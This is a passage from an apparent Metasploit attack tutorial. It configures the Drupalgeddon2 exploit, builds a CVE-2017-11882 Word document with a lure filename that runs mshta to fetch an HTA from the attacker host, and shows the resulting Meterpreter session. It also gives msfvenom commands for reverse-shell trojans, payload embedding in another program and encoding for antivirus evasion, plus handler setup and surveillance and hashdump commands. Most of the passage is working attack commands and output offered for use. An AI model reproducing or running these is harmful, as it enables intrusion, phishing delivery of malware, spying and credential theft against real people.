Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
DUMP_OUTPUT  false            no        Dump payload command output
PHP_FUNC     passthru         yes       PHP function to execute
Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT        80               yes       The target port (TCP)
SSL          false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI    /                yes       Path to Drupal install
VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.189.141  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.


The only option that still needs a value is the target: set rhosts 192.168.189.139

With that configured, run launches the attack.

Verdict:

Personally I think this is very elegant!!

Note that the default payload, php/meterpreter/reverse_tcp, runs inside the web server process, so the session has the privileges of the web server account (www-data on a Debian Apache host), not root.

5. Passive (client-side) exploitation

office_cve_2017_11882:

Affected Office versions: 2007-2016

Using the Python script:

python2 Command_CVE-2017-11882.py -c "calc" -o test.doc generates a Word document; once the document is opened on the target machine it automatically runs the command calc and a calculator pops up. A reverse-shell command can be put there instead to make the target call back.

To drive this from msf: the repository cloned from GitHub contains an .rb module. Copy it into the exploit/icon_tools/ module path (user-supplied modules belong under ~/.msf4/modules/exploits/<path>/ and are picked up after reload_all); show options then lists the parameters, explained below:

msf6 > use exploit/icon_tools/office_cve_2017_11882
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(icon_tools/office_cve_2017_11882) > show options

Module options (exploit/icon_tools/office_cve_2017_11882):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.189.141  yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Automatic



View the full module info with the info, or info -d command.

SRVHOST is the address the server listens on, SRVPORT its port and URIPATH the path; set them as follows:

msf6 exploit(icon_tools/office_cve_2017_11882) > set srvport 80
srvport => 80
msf6 exploit(icon_tools/office_cve_2017_11882) > set uripath /a
uripath => /a
msf6 exploit(icon_tools/office_cve_2017_11882) > show options

Module options (exploit/icon_tools/office_cve_2017_11882):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT  80               yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH  /a               no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.189.141  yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(icon_tools/office_cve_2017_11882) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.189.141:4444
msf6 exploit(icon_tools/office_cve_2017_11882) > [*] Using URL: http://192.168.189.141/a
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.189.141/a"


This starts a server hosting an HTA file, which the mshta interpreter on Windows will execute.

The Windows command is mshta.exe "http://192.168.189.141/a": it makes the target download the file and run it.

Next, generate the malicious Word document with the Python script:

python2 Command_CVE-2017-11882.py -c "mshta.exe "http://192.168.189.141/a"" -o 如何给女朋友过好八十大寿.doc

(The inner double quotes are consumed by the shell, so the embedded command is mshta.exe http://192.168.189.141/a, which works just the same.)

┌──(root㉿zss)-[/home/zss/CVEtools/CVE-2017-11882/CVE-2017-11882]
└─# python2 Command_CVE-2017-11882.py -c "mshta.exe "http://192.168.189.141/a"" -o 如何给女朋友过好八十大寿.doc
[*] Done ! output file >> 如何给女朋友过好八十大寿.doc <<

The attack document is generated. Upload it to the target; when the victim opens it, mshta.exe "http://192.168.189.141/a" runs, the HTA at /a is downloaded and executed, and the session calls back to us.

Once the target opens the malicious file, it calls back to Kali automatically:

msf6 exploit(icon_tools/office_cve_2017_11882) >
[*] 192.168.189.250 office_cve_2017_11882 - Delivering payload
[*] Sending stage (176198 bytes) to 192.168.189.250
[*] Meterpreter session 2 opened (192.168.189.141:4444 -> 192.168.189.250:49479) at 2024-07-30 10:51:41 +0800
dir
[*] exec: dir

office_cve_2017_11882.rb
msf6 exploit(icon_tools/office_cve_2017_11882) > sessions -i

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows admin-PC\admin @ ADMIN-PC 192.168.189.141:4444 -> 192.168.189.250:49479 (192.168.189.250)

msf6 exploit(icon_tools/office_cve_2017_11882) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

Summary of the flow: put the .rb module from GitHub into msf's exploit modules, use it to serve the call-back script over HTTP, use the Python script to build a .doc that triggers the Office remote code execution vulnerability, and when the target opens the Word document the call-back command runs automatically.

6. msfvenom

msfvenom generates shellcode in many forms: many programming languages, platforms and file formats. Put simply, it generates "trojan backdoors". It is the companion tool to msf.

Common parameters:

msfvenom -h: learn to read the documentation.

Examples:

<1> Common command for generating a backdoor

/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

I generated the following simple reverse-connection trojan:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -f exe -o payload.exe

Upload it to the Windows 7 host; when it is run, a shell comes back to my machine:

Supplement:

Backdoor generation commands:
Example:
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -f exe -o payload.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -x wecheat.exe -k -f exe -o wecheat.exe
Explanation:
-x: use another exe as the template and embed the payload in it
-k: keep the template's original behaviour (the payload is injected as a new thread so the host program still works)
-f: output format, exe here
-o: output file

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -i 12 -e x86/shikata_ga_nai -f exe -o payload.exe

Explanation:
-i: number of encoding iterations, 12 here
-e: the encoder to use
An attempt at AV evasion. In practice stacked shikata_ga_nai iterations are a well-known pattern that current AV flags reliably; this changes the bytes, not the behaviour.

<2> Start a listener in msf

msf6 > search exploit/multi/handler

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
2 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
3 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
4 exploit/multi/handler manual No Generic Payload Handler
5 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
6 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
7 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence


Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/local/yum_package_manager_persistence

msf6 > use 4
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

Inside the handler, show options:

[image: show options output for exploit/multi/handler]

Note: the trojan was generated with the payload windows/meterpreter/reverse_tcp, so the handler's payload has to be set to exactly that, and the host IP and port set to match:

As follows:

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.189.141

With that set, start the handler (exploit, or exploit -j to run it as a background job) and wait for the target to run the implant and call back.
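The mismatch the note above warns about (handler payload not equal to the msfvenom payload) is easy to make mechanical. As an added example that is not part of the page or of Metasploit, this Ruby snippet parses the msfvenom command that produced the implant and derives the handler commands from it, so PAYLOAD, LHOST and LPORT cannot drift; it also refuses a bind payload without an RHOST, since a bind_tcp implant listens on the target instead of connecting back. The option list it understands is an assumed subset of msfvenom's flags, enough for the commands on this page.

```ruby
# Added example, not from the page or from Metasploit: derive multi/handler
# settings from the msfvenom command line that built the implant.
require "shellwords"

# Flags that consume one value (assumed subset of msfvenom's option list).
VALUE_FLAGS = %w[-f -o -e -i -x -a -b --platform --format --out --encoder --iterations --template --arch].freeze

# Parse "msfvenom -p PAYLOAD lhost=... lport=... ..." into { payload:, vars: {} }.
# msfvenom treats datastore variables case-insensitively, so they are upcased here.
def parse_msfvenom(cmd)
  argv = Shellwords.split(cmd)
  argv.shift if argv.first && File.basename(argv.first) == "msfvenom"
  opts = { payload: nil, vars: {} }
  until argv.empty?
    tok = argv.shift
    case tok
    when "-p", "--payload"           then opts[:payload] = argv.shift
    when *VALUE_FLAGS                then argv.shift            # value not needed for the handler
    when /\A([A-Za-z_]+)=(.*)\z/     then opts[:vars][$1.upcase] = $2
    end                                                          # other flags (-k, ...) are ignored
  end
  raise ArgumentError, "no -p payload in command" unless opts[:payload]
  opts
end

# Console lines for a handler that matches the implant exactly.
def handler_commands(cmd)
  o = parse_msfvenom(cmd)
  bind = o[:payload].include?("bind_")
  need = bind ? %w[RHOST LPORT] : %w[LHOST LPORT]
  missing = need - o[:vars].keys
  raise ArgumentError, "payload #{o[:payload]} needs #{missing.join(', ')}" unless missing.empty?
  lines = ["use exploit/multi/handler", "set PAYLOAD #{o[:payload]}"]
  need.each { |k| lines << "set #{k} #{o[:vars][k]}" }
  lines << "set ExitOnSession false"   # keep listening after the first session
  lines << "exploit -j -z"
  lines
end

if __FILE__ == $0
  puts handler_commands("msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -x wecheat.exe -k -f exe -o wecheat.exe")
end
```

Keep the printed lines in a handler.rc and start it with msfconsole -r handler.rc; because the staged x64 meterpreter and the x86 one are different payloads, a handler built this way from the actual build command is the simplest guard against the staging failure that a mismatch produces.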

7. meterpreter

  • Remote-access trojan
  • C2 (command and control)

Technical advantages:

Cross-platform:

Metasploit provides Meterpreter versions for the major operating systems and platforms, including Windows, Linux and BSD, on both x86 and x64. There are also Java and PHP implementations for other environments.

In-memory operation:

When an exploit runs, Meterpreter's DLL is loaded directly into the memory of the target process rather than being written to disk and started with LoadLibrary. This makes startup stealthier and harder for file-based antivirus to catch, and because the target's disk is not touched it leaves little forensic evidence there. Memory analysis can still recover traces of Meterpreter afterwards, and modern EDR products scan memory, so "nothing on disk" should not be read as "undetectable". The payload runs inside the exploited process rather than creating a new one (unless it is later migrated).

Flexible, encrypted communication:

Meterpreter provides a flexible, encrypted client-server communication protocol: network traffic is encrypted, and the protocol is designed to be extended.

Its wire format is TLV (type-length-value) encapsulation.

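The TLV encapsulation just mentioned, as an added example that is not Meterpreter's own implementation: each TLV is [length:4][type:4][value], big-endian, with length covering the 8-byte header, and the high bits of the type say how the value is to be read. The META_* constants are the meta-type bits Meterpreter actually uses; the packet-level wrapper that precedes the TLVs on the wire (XOR key, session GUID, encryption flags) is left out, and the request id below is made up.

```ruby
# Added example, not Meterpreter's code: its TLV framing as a standalone
# encoder/parser. core_channel_open is a real Meterpreter method name.
META_STRING = 1 << 16   # NUL-terminated string
META_UINT   = 1 << 17   # 32-bit unsigned, big-endian
META_RAW    = 1 << 18   # opaque bytes
META_GROUP  = 1 << 30   # value is itself a sequence of TLVs

TLV_METHOD     = META_STRING | 1
TLV_REQUEST_ID = META_STRING | 2

def tlv(type, value)
  body =
    if    (type & META_STRING) != 0 then value.b + "\x00".b
    elsif (type & META_UINT)   != 0 then [value].pack("N")
    elsif (type & META_GROUP)  != 0 then value.map { |t, v| tlv(t, v) }.join.b
    else                                  value.b
    end
  [body.bytesize + 8, type].pack("NN") + body     # length includes the 8-byte header
end

# Parse a byte string into [[type, value], ...]. Every length is checked
# against the remaining buffer before it is used: the peer controls these
# fields, so a receiver that trusts them reads past the end of its buffer.
def parse_tlvs(bytes)
  out = []
  off = 0
  while off + 8 <= bytes.bytesize
    len, type = bytes.byteslice(off, 8).unpack("NN")
    raise "bad length #{len} at offset #{off}" if len < 8 || off + len > bytes.bytesize
    body = bytes.byteslice(off + 8, len - 8)
    value =
      if    (type & META_STRING) != 0 then body.chomp("\x00".b)
      elsif (type & META_UINT)   != 0 then body.unpack1("N")
      elsif (type & META_GROUP)  != 0 then parse_tlvs(body)
      else                                  body
      end
    out << [type, value]
    off += len
  end
  raise "trailing #{bytes.bytesize - off} bytes" unless off == bytes.bytesize
  out
end

# A request carries at least the method name and a request id.
def build_request(method, request_id)
  tlv(TLV_METHOD, method) + tlv(TLV_REQUEST_ID, request_id)
end

if __FILE__ == $0
  pkt = build_request("core_channel_open", "req-0001")   # request id is made up
  puts pkt.unpack1("H*")
  p parse_tlvs(pkt)
end
```

The nested-group case is how Meterpreter carries structured arguments (channel parameters, file listings) inside one packet, and the length check is the difference between a parser and a crash when the other end is not the Meterpreter you expect.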
Easy to extend:

Meterpreter goes far beyond what ordinary shellcode offers, and when special or custom functionality is needed, extensions or plugins can easily be added to it.

Common basic commands:

meterpreter > ?

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components


Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

Command Description
------- -----------
play play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Those are the basic commands.